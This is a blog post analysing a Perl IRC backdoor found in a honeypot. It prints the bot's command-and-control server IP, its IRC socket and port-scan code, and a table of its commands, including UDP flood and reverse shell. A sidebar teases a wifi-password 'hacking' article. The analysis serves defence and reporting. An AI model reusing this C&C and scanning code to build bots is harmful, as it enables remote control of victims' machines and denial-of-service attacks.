Skip to main content

Botnet analysis based on IRC network

With one of my many honeypots actived around the world wide web, I discovered an interesting script written with the famous Perl programming language. This Perl script is a malware used to remotely control a machine, opening what is technically called backdoor. If this malicious program runs on multiple machines, there is a possibility that the attacker may have created a botnet.

At first, a botnet is a network controlled by a bots master and composed of devices infected with specialized malware, called bots or zombies (“Computer zombie”).

Devices connected to the Internet within which there are vulnerabilities in their infrastructure can sometimes become part of the botnet, even if they do not have the malware installed. Through the backdoor, the botmaster can control the system via remote access. Thus infected computers can launch attacks, named, Distributed Denial of Service against other systems or perform other illicit operations.

How it works is relatively simple. Once the machine has been infected, the malware has to listen to the attacker’s remote instructions. There is therefore a sort of node, also called C&C (command and control), which gives “orders” executed by the infected machines.

And there we have the first problem. The centralization of the control point, also called C&C. The central node has to be safe, away from any ISPs and application such as firewalls and antivirus who might notice and block the attack. The authors use various techniques to try to make themselves “invisible” to the user and firewall.

Then the solution is easy: using a decentralized network. No, I’m not talking about using blockchain for botnet (even it’s a funny idea). Some hackers (if they can be defined) use peer-to-peer protocols, and others one use IRC too. And it is IRC that I will go to discuss.

In fact, the malicious program is listening to commands by connecting to a private channel or private chat using the open IRC network. Through the conversation channel, the author is able to control all the infected systems which are listening to the channel. The unknown attacker can be tens of thousands, and to give an order, requiring screen images, credentials and much more.

The program

The program is a clear example of the attempt to add the infected machine to a botnet. Through this post, we will analyze step by step the implemented code. At the beginning of the script we can find interesting variables, useful for connecting to the IRC service.

my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.205");

@mast3rs sounds like an unknown array, but only at the end will we understand what it might be; @hostauth would seem to indicate a sort of auth; @admchat specifies an IRC channel, while @server defines the IP of the IRC server to which the machine must connect.

In this excerpt, we have further confirmation of using an IRC socket to communicate with the attacker.

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);`

The username for IRC is generated by joining the @nickname variable with a random number.

my @nickname = ("b");
sub getnick {
        return "$nickname[rand scalar @nickname]".int(rand(20000));
}

Once the machine is connected to IRC, the program is ready to receive information. The attacker (which is operator on IRC) calls the “X” function. For each existing function, a command to be executed is associated. Each function is defined with a regex, here a summary table.

Command Example How it works
ps IP ps 127.0.0.1 Scanning of open ports on the ip. The ports are hard-encoded on the script (array @portas).
nmap IP initial_range final_range nmap 127.0.0.1 27 40 Scanning of open ports on the specified ip. The function supports a range.
rm rm Clean - removing the malware.
version version Priting malware version
download file download home.txt Download a file from the infected device.
udp IP port time (ms) udp 127.0.0.1 20 400 Sending flood-based attack via UDP packets.
back IP port back 171.2.19.201 80 Install a reverse shell.

For example, with the “pv” command, the infected device is a port scanning to find out if any ports are open (ports are defined on the @portas array). The nmap command also serves the same thing, but the ports are specific to a range of values.

my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");`

This code will check if the port is opened. Simply $scansock is TRUE only when the port returns a valid response.

foreach my $porta (@portas)  {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
        ....
}

If $scansock is valid, the script will send a private message to $printl

sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");

Reporting

Once you find any malware, you should report the various IPs related to the possible illegal activity and the malware itself. In all likelihood, the attack will be (more or less) stopped since there is usually a connected domain / ip and the fact can be reported to the third parties.

Then I’ve tried to join to this IRC server.

16:31 [912]  -!- **Irssi:** Connection to **91.191.19.205** established
16:31 [912]  -!- !unreal.org  *** Looking up your hostname...
16:31 [912]  -!- !unreal.org  *** Couldn't resolve your hostname; using your IP address instead
16:31 [912]  -!- /list LIST command
16:31 [912]  -!- Channel User 
16:32 [912]  -!- #ircd 1132 [+sntu]
16:32 [912]  -!- #aka 85 [+sntu]
16:32 [912]  -!- #ph1 261 [+sntu]
16:32 [912]  -!- #ssh 46 [+sntu]

Comments

Popular posts from this blog

How to hack wifi in Windows 7/8/8.1/10 without any software | using with cmd

How to Hack Wifi password using cmd Hello Friends, In this article we will share some tricks that can help you to hack wifi password using cmd. Youcan experiment these trick with your neighbors or friends. It’s not necessarily that this trick will work with every wifi because of upgraded hardware. But you can still try this crack with wifi having old modems or routers. 1: WEP: Wired Equivalent Privacy (WEP) is one of the widely used security key in wifi devices. It is also the oldest and most popular key and was added in 1999. WEP uses 128 bit and 256-bit encryption. With the help of this tutorial, you can easily get into 128-bit encryption and Hack WiFi password using CMD. 2: WAP and WAP2: Wi-Fi Protected Access is an another version of WiFi encryption and was first used in 2003. It uses the 256-bit encryption model and is tough to hack. WAP2 is an updated version of WAP and was introduced in 2006. Since then it has replaced WAP and is now been used mostly in offices and colle...

A Beginner’s Guide to Getting Started with Bitcoin

A man looks for Bitcoin Oasis If you have heard about blockchain or cryptocurrency, then the term that initially comes to mind is Bitcoin . Launched 12 years ago, it was the late 2017 bull run that created a media frenzy that propelled Bitcoin into the mainstream and our modern day lexicon. Often labeled as the “original” cryptocurrency, Bitcoin has been the catalyst (directly and/or indirectly) behind many new innovations in the blockchain and digital asset space, most notably Ethereum and Monero . Shortly after the late 2017 bull run lost its steam, interest in these new technologies started to fade ― but here we are in 2021 with Bitcoin having risen like a phoenix from the ashes. As you would assume, an appetite for the blockchain and digital asset space has returned and now it is more important than ever that we understand what exactly is behind this unique asset, Bitcoin. This article is meant to be a guide for individuals who are new to cryptocurren...

Copilot - Microsoft is gearing up to introduce its AI companion

 Microsoft is gearing up to introduce its AI companion, Copilot, this upcoming fall season. The highly-anticipated rollout is scheduled for September 26, with Copilot poised to seamlessly integrate with various Microsoft services, including Windows 11 and Microsoft 365. Additionally, enterprise customers can look forward to the availability of a new AI assistant, Microsoft 365 Chat, starting in November. Copilot, described by Yusuf Mehdi, Corporate Vice President and Consumer Chief Marketing Officer at Microsoft, as an "everyday AI companion," aims to make your daily workflow smoother and more efficient. Its primary goal is to embed an AI-powered "copilot" within Microsoft's most popular products, ensuring widespread accessibility. What distinguishes Copilot from other AI assistants is its focus on integration. Rather than operating in isolation within specific applications, Copilot promises a seamless user experience across multiple Microsoft products. This com...